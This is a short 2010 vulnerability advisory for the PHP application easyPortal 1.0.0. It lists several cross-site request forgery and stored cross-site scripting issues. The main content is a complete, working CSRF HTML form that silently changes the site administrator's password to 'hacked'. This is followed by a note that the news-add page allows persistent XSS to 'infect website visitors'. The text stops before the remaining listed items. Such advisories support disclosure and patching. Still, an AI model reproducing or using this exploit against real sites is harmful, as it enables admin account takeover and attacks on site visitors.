1 [#−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−#]
2 [#] Author: Milos Zivanovic
3 [#] Email: milosz.security[at]gmail.com
4 [#] Date: 02. January 2010.
5 [#−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−#]
6 [#] Application: easyPortal
7 [#] Version: 1.0.0
8 [#] Platform: PHP
9 [#] Homepage: http://www.eazyportal.com/
10 [#] Vulnerability: Multiple XSRF Vulnerabilities And Persistent XSS
11 [#−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−#]
12
13 [#]Content
14 |−−Change admin password
15 |−−Add news − Persistent XSS
16 |−−Remove private message by id
17 |−−Remove news by id
18
19 [*]Change admin password
20
21 [EXPLOIT−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−]
22 <form action="http://host/" enctype="multipart/form−data" method="post">
23 <input type="hidden" name="a" value="profile"/>
24 <input type="hidden" name="uname" value="admin"/>
25 <input type="hidden" name="uavatar" value=""/>
26 <input type="hidden" name="uemail" value="e@mail.com"/>
27 <input type="hidden" name="upwd" value="hacked"/>
28 <input type="hidden" name="ucpwd" value="hacked"/>
29 <input type="hidden" name="ulocation" value="moon"/>
30 <input type="hidden" name="usignature" value="free your mind and the
31 ass will follow"/>
32 <input type="hidden" name="ushowemail" value="0"/>
33 <input type="hidden" name="ugmt" value="0"/>
34 <input type="hidden" name="ufile"/>
35 <input type="image"
36 src="http://host/tpl/DefaultGreen/img/button_submit.gif"
37 name="submit"/>
38 </form>
39 [EXPLOIT−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−]
40
41 [+]Add news − Persistent XSS
42
43 http://host/index.php?a=administrator&p=news&s=add
44
45 There we can add new news that can be seen on main page. It is
46 vulnerable to persistent xss and
47 attacker can use this to infect website visitors.